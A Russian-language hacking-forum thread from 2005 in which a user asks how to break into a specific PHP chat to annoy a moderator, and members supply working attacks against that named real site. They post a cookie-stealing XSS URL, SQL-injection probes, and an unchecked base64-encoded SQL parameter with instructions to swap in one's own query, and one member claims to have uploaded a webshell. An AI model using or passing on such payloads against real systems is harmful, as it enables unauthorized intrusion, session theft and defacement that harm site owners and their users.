Какие есть уязвимости у чатов написанных на php?

Discussion in 'Песочница' started by Va_RuS, 7 Nov 2005.

  1. Va_RuS

    Va_RuS New Member

    Joined:
    29 Oct 2005
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Так вот мне интересно узнать, какие есть уязвимости для чатов на php.
    Обычные пользователи ничего сделать немогут, но
    админы и модеры могут вставлять картинки, писать большими биквами и т.п.

    А обычный пользователь так сможет?
    Можно ли взломать как-нибудь??
     
  2. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    кидай сюда ссылку, я так понимаю что тебя определённый чат интересует?

    все чаты разные => уязвимости тоже разные
     
  3. Va_RuS

    Va_RuS New Member

    Joined:
    29 Oct 2005
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
  4. Va_RuS

    Va_RuS New Member

    Joined:
    29 Oct 2005
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Ну так как сделать то?
     
  5. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    дай логин и пароль а то у них там с регистрацией проблемы
     
  6. Va_RuS

    Va_RuS New Member

    Joined:
    29 Oct 2005
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    чел свои не дам)) но у мя там ник завалялся... ща...
    логин Vaz*****
    пас **********
    -----------------
    за логином и пассом стучите в ПМ
     
    #6 Va_RuS, 9 Nov 2005
    Last edited: 11 Nov 2005
  7. XgLuiR

    XgLuiR New Member

    Joined:
    7 Nov 2005
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Чат чемто похож на Бородинский
     
  8. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    вот по быстрому нашёл...

    http://energyfm.ru/chat/history.php?idchat=energy&what="><script>alert(document.cookie)</script>
    http://energyfm.ru/chat/history.php?idchat='
    http://energyfm.ru/chat/getnewmes.php?idchat='

    вот как сообщение выглядят в коде...

    parent.window.tickerDiv.innerHTML+'<p style="color: br;"><b><font color="#0000FF">Vaz21043</font></b> : \'&lt;&gt;()\'&quot;</p>';

    сдесь можно посмотреть все сообщения в коде...

    http://energyfm.ru/chat/getnewmes.php?idchat=energy

    не забудь про репутацию (слева плюсик нажми зелёненький) ;)
     
    2 people like this.
  9. Va_RuS

    Va_RuS New Member

    Joined:
    29 Oct 2005
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Слух, а до меня что-то не допело. А как пистаь большими буквами. под наклоном.. и т.п. ?

    На плесик ОБЯЗАТЕЛЬНО нажму.
     
  10. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    зачем тебе это , у тебя куки имеются на руках )))
     
  11. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Vector-G там не только скуль ну и какойто дибильный инклуд...
     
  12. Va_RuS

    Va_RuS New Member

    Joined:
    29 Oct 2005
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Мне интересно, и побесить одного дебильного модера!))
     
  13. link.

    link. Elder - Старейшина

    Joined:
    15 May 2005
    Messages:
    47
    Likes Received:
    3
    Reputations:
    0
    Только что нашел дыру, статус : критическая, залил вебшелл...тут выкладывать не буду, на всяк случай.....Va_RuS , стучи в ПМ
     
    #13 link., 10 Nov 2005
    Last edited: 10 Nov 2005
    1 person likes this.
  14. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Может в ПМ напишеш уязвимость ?
     
  15. Va_RuS

    Va_RuS New Member

    Joined:
    29 Oct 2005
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Tem не понял намека!?!
     
  16. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    Чат и вообще этот форум лично мне показались очень интересными - просто рай, от инклуда до скуль инжа в base64 кодировке. Вообщем инклуд все увидели, а такой запрос для меня оказался более интересным:
    Code:
    http://energyfm.ru/?an=foto_slu&condition=czIgbGlrZSAnTG9uZG9uLCBFbmdsYW5kJSc%3D
    
    теперь самое интересное - расшифровка переменной condition. Сам первый раз такое вижу, но вот condition=s2 like 'London, England%' - забавно)))
    запрос сразу передаётся в базу подаётся вообще без проверок!!! это что-то!
    а теперь вбиваем нужнй нам запрос и кодируем в base64, подставляем и будет счастье.
    ---
    ЗЫ
    Буду есчо лазить по сайту, очень уж понравилось
     
    1 person likes this.
  17. Va_RuS

    Va_RuS New Member

    Joined:
    29 Oct 2005
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    ZaCo )))
     
  18. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    На самом деле "забавно" Мне на этот сайт пох,но интересное решение нашел кодер)))))
     
  19. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    А никто не будет против если я видео по взлому сниму?
     
  20. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    я думаю ты просто не успеешь... щас какой-нибудь даун начитается в этой теме и пойдёт дефейсить...
     
Loading...